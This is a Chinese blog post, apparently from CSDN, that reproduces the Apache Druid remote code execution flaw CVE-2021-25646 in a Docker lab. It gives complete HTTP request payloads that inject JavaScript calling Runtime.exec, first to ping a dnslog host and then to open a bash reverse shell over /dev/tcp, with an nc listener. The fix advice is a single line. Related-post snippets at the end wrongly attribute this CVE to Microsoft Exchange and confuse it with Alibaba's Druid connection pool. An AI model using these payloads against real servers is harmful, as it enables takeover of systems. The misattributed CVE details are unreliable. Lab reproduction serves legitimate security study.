CVE-2021-25646:Apache Druid RCE远程代码执行复现

最新推荐文章于 2024-04-10 02:36:47 发布
最新推荐文章于 2024-04-10 02:36:47 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 漏洞 文章标签: apache 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/122217842
版权

--学如逆水行舟,不进则退

每天学习一些知识来充实自己,今天再来复现一个漏洞

0x01 漏洞简介

Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库

Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。

0x02 影响版本

影响版本: Apache Druid < 0.20.1
安全版本: Apache Druid 0.20.1

0x03 漏洞复现

攻击机:win10

靶机:Centos7

    1.环境搭建

docker pull fokkodriesprong/docker-druid #拉取镜像
docker run --rm -i -p 8888:8888  fokkodriesprong/docker-druid #启动镜像

 

 

访问靶机ip:8888,出现以下页面,说明搭建成功 

 2.win10开始攻击

   使用bp抓包,并且通过dnslog测试是否可以回显(也就是是否可以代码执行)

POC      (poc中的ping 后面的dnslog地址注意更换) (HOST以及Referer处ip也要改成目标ip)

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.166.129:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 556
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.166.129:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping n5ianx.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

 抓包后,发现可以回显,也就是说可以远程代码执行 

  反弹shell

 POC (同上一样,只是把ping命令转换为反弹shell的命令)

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.166.129:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 556
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.166.129:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/1122 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

nc监听端口 

nc -lvvp 1122

构造数据包发送,发现反弹成功 

 

 

0x04 漏洞修复

把Apache Drui更新为安全版本或最新版本

种树人1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Druid RCECVE-2021-25646复现
锋刃科技的博客
02-02 3624
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 这里使用docker来搭建 拉取镜像并启动Apache Druid:0.16.0版本的环境 docker pull fokkodrie...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
log4j2 RCE漏洞复现,2024年最新高级网络安全程序员必会
最新发布
e846815793的博客
04-10 335
下载log4j2镜像:(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)启动log4j2镜像:浏览器登录:点击?????
十分钟了解 Apache Druid
码哥字节
03-05 7631
十分钟了解 Apache Druid 导读:Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。本文将带你简单了解 Druid 的特性,使用场景,技术特点和架构。这将有助于你选型数据存储方案,深入了解 Druid 存储,深入了解时间序列存储等。 关注公众号 MageByte,设置星标获取最新干货。公众号后台回复 “加群” 进入技术...
druid 远程命令执行CVE-2021-25646
qq_40646572的博客
05-12 824
启动服务,输入对应的8888对应的端口。druid服务控制端一般是绑定在8888端口。直到出现填写optional filter。填完后,点击Add功能时,将包拦截。在LoadData 功能页面中存在Local disk功能,将其打开。发送包后,在dnslog平台可以获取到dns解析记录。将filter中的内容进行替换,修改为我们的poc。填写对应的值,其中的值是一一对应的。打开 Load Data 功能。2、限制非信任的设备对服务的访问。1、及时更新新的版本。
Apache Druid 远程代码执行漏洞(CVE-2021-25646
Lsec的博客
03-13 851
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 docker pull fokkodriesprong/docker-druid docker run --rm -i -p 8888:8888 fokkodriespr
CVE-2021-25646Apache Druid远程代码执行漏洞
就是法老
08-24 1981
一:漏洞描述 阿里云安全Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
Apache druid未授权命令执行漏洞复现(CVE-2021-25646)
deng_menglihua的博客
04-19 3446
Apache druid未授权命令执行漏洞复现(CVE-2021-25646) 1.简介 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 2.漏洞概述 编号:CVE-2021-25646(严重) Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 3.影响版本 Apache Druid < 0.20.1 4.环境搭建 ubuntu 1.安装doc
CVE-2021-25646Apache Druid RCE复现
黑白的博客
05-02 1424
声明 好好学习,天天向上 漏洞描述 Druid不仅是一个数据库连接池,还包含一个ProxyDriver、一系列内置的JDBC组件库、一个SQL Parser。 支持所有JDBC兼容的数据库,包括Oracle、MySql、Derby、Postgresql、SQL Server、H2等。 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的
Apache Druid 代码执行漏洞(CVE-2021-25646
qq_69775412的博客
03-08 706
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。
Apache Druid RCE漏洞复现(QVD-2023-9629)
qq_50854662的博客
06-27 804
Apache Druid RCE漏洞复现(QVD-2023-9629)
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
Silentsoul04#vulnerability-paper-1#CVE-2021-25646Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
复现nuclei——CVE-2021-25646Apache Druid 命令执行漏洞)
记录并分享学习安全的知识点..
01-18 1240
一、漏洞介绍 Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 二、漏洞检测和判别方式 直接在网站的url中后加上: /druid/index.html 如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞! 三、nuclei扫描结果 四、漏洞复现 exp如下:
Apache DruidCVE-2021-25646远程代码执行漏洞复现
ximo的博客
04-27 738
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以
Apache Druid 命令执行漏洞(CVE-2021-25646)复现及排查
dayouzi的博客
08-15 273
Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码
CVE-2021-25646复现
虚心学习,脚踏实地
05-29 261
CVE-2021-25646复现
cve-2021-25646
12-17
CVE-2021-25646是指微软Exchange Server中的一个安全漏洞,该漏洞影响了多个版本的Exchange Server,包括2013、2016和2019。攻击者可以利用这个漏洞来远程执行恶意代码,可能导致服务器被攻击者完全控制。这个漏洞可能会对组织的安全性造成严重威胁,因此需要及时采取措施进行修复。 微软已经发布了安全更新来修补这个漏洞,并强烈建议用户立即安装这些更新以保护其Exchange Server。此外,微软还提供了一些临时的解决方案,以帮助用户在安装更新之前暂时减轻这个漏洞可能带来的风险。 作为组织的一部分,我们需要密切关注这个漏洞,并确保我们的Exchange Server及时进行了更新或采取了相应的临时解决方案。我们还应该加强日常的网络安全管理,包括监控服务器的异常活动,并及时响应任何安全事件。 最后,我们也需要提高员工的网络安全意识,加强培训和教育,以防范钓鱼邮件等安全威胁,同时加强内部权限管理,避免不必要的漏洞利用。通过这些综合的安全措施,我们可以更好地应对CVE-2021-25646带来的安全威胁,保护组织的信息资产安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值